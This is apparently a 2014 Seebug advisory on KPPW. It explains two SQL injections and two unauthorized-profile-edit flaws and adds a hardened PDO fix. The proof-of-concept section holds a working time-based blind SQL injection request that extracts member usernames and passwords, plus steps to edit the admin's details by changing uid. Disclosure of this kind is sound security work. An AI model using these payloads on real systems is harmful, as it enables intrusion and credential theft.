Latest KPPW: SQL Injection Vulnerabilities III (two SQL injections and two unauthorized-access issues)

2014-12-09T00:00:00
ID SSV:94515
Type seebug
Reporter Root
Modified 2014-12-09T00:00:00

Description

Brief description:

Latest KPPW: SQL injection vulnerabilities III (two SQL injections and two unauthorized-access issues), script attached

Details:

Latest KPPW: SQL injection vulnerabilities III (two SQL injections and two unauthorized-access issues), script attached.

First SQL injection. File /control/user/account_basic.php:

if ($intUserRole === 2) {
    ......
} else {
    $intAuthStatus = keke_auth_fac_class::auth_check ( "realname", $gUid );
    if (isset($formhash) && kekezu::submitcheck($formhash)) {
        if (strtotime($birthday) >= strtotime(date('Y-m-d', time()))) {
            $tips['errors']['birthday'] = '出生日期不得大于或等于当前日期';
            kekezu::show_msg($tips, NULL, NULL, NULL, 'error');
        }
        if (strtoupper ( CHARSET ) == 'GBK') {
            $truename = kekezu::utftogbk($truename);
        }
        $arrData = array(
            'indus_pid' => $indus_pid,
            'indus_id'  => $indus_id,
            'truename'  => $truename,
            'sex'       => $sex,
            'birthday'  => $birthday,
        );
        $objSpaceT->save($arrData, $pk);
        unset($objSpaceT);
        kekezu::show_msg('已保存', NULL, NULL, NULL, 'ok');
    }
}

Here, when the basic profile is saved, the request variable $pk is passed straight into save(). Following save() into /lib/inc/keke_table_class.php:

function save($fields, $pk = array()) {
    foreach ( $fields as $k => $v ) {
        $kk = ucfirst ( $k );
        $set_query = "set" . $kk;
        $this->_table_obj->$set_query ( $v );
    }
    $keys = array_keys ( $pk );
    $key = $keys [0];
    if (! empty ( $pk [$key] )) {
        // $key (the array key supplied by the client) is concatenated unquoted
        $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
        $edit_query = "edit_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$edit_query ();
    } else {
        $create_query = "create_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$create_query ();
    }
    if ($res) {
        return $res;
    } else {
        return false;
    }
}

When $pk[$key] is non-empty, $key is placed into the WHERE condition and then reaches $edit_query, i.e. the SQL statement. Because in this system the key comes from request parameters registered as globals, and it is neither quoted nor escaped, the result is SQL injection.

Second SQL injection. File /control/user/account_contact.php:

if (isset($formhash) && kekezu::submitcheck($formhash)) {
    $arrData = array(
        'email'    => $email,
        'mobile'   => $mobile,
        'qq'       => $qq,
        'msn'      => $msn,
        'phone'    => $phone,
        'province' => $province,
        'city'     => $city,
        'area'     => $area
    );
    $intRes = $objSpaceT->save($arrData, $pk);

Likewise the variable $pk flows into the SQL statement; the mechanism is the same, so this is a second SQL injection. Moreover, because the WHERE condition for updating a user's basic information is built from the uid supplied in the request rather than from the logged-in session, the basic information of any user can be updated here, an unauthorized operation. In the same way, any user's contact details can be modified. In total: two SQL injections and two unauthorized operations.
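The two root causes are an unvalidated column name in the WHERE clause and a row selector taken from the request. As an added example (not KPPW's own code), the following hardened save() closes both: the key must come from an allow-list of primary-key columns, the value is bound as a parameter, and the caller selects the row with the session uid ($gUid). It assumes PHP 8 and a PDO connection; the table name is a placeholder.

```php
<?php
// Added example, not part of KPPW: a save() that is safe against both the
// injection (unquoted $key) and the IDOR (client-chosen uid) described above.
final class SafeTable
{
    // Only these identifiers may ever appear as the WHERE key.
    private const PK_COLUMNS = ['uid', 'id'];

    public function __construct(private PDO $db, private string $table) {}

    /** $fields: column => value pairs; $pk: e.g. ['uid' => 5529]. */
    public function save(array $fields, array $pk = []): bool
    {
        $assign = [];
        foreach (array_keys($fields) as $col) {
            // Column names cannot be bound, so they are validated instead.
            if (!preg_match('/^[a-z_][a-z0-9_]*$/i', $col) || $col === 'pk') {
                throw new InvalidArgumentException("bad column name: $col");
            }
            $assign[] = "`$col` = :$col";
        }
        $key = array_key_first($pk);
        if ($key !== null && $pk[$key] !== null && $pk[$key] !== '') {
            if (!in_array($key, self::PK_COLUMNS, true)) {
                // Rejects attacker-supplied keys such as "uid=1 and sleep(5)#"
                throw new InvalidArgumentException("key not allowed: $key");
            }
            $sql = sprintf('UPDATE `%s` SET %s WHERE `%s` = :pk',
                $this->table, implode(', ', $assign), $key);
            $params = $fields + ['pk' => $pk[$key]];   // value is bound, never concatenated
        } else {
            $cols = array_keys($fields);
            $sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s)', $this->table,
                implode(', ', array_map(fn ($c) => "`$c`", $cols)),
                implode(', ', array_map(fn ($c) => ":$c", $cols)));
            $params = $fields;
        }
        return $this->db->prepare($sql)->execute($params);
    }
}

// Caller side (account_basic.php / account_contact.php): the row to update is
// chosen by the authenticated user's id, not by a $pk array from the request.
// $pdo and $tableName are assumed to exist; $gUid is KPPW's session uid.
// $objSpaceT = new SafeTable($pdo, $tableName);
// $objSpaceT->save($arrData, ['uid' => $gUid]);
```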

Proof of vulnerability:

Sending this request returns after a 5-second delay:

POST /KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic
Content-Length: 239
Cookie: PHPSESSID=v8bshmlaa5qi5s47tnbpvulba5
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

formhash=6cb7d4&pk%5Buid%3d5529+and+if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)%3dchar(97),sleep(5),1)%23%5D=5529&indus_pid=-1&indus_id=-1&truename=%E4%B9%8C%E4%BA%91%E4%B8%80&sex=-1&birthday=1111-11-11

Database execution result:

[Screenshot 1.png: https://images.seebug.org/upload/201412/070150135b4361998e372b8b34c9dce5318195d6.png]

The SQL statement executed successfully. Data can be extracted with sqlmap; the test code provides a simple data-dumping script.

For the unauthorized operation: register an ordinary user and log in, then edit the contact details, capture the request, and change uid to 1, which is the admin's uid.

[Screenshot 3.png: https://images.seebug.org/upload/201412/07021956e2ee4e0fd7cd2bc8c3b0143baf097cc5.png]

The administrator's contact details can then be modified.

[Screenshot 2.png: https://images.seebug.org/upload/201412/07021631f26170caa602493b4fede70636225c64.png]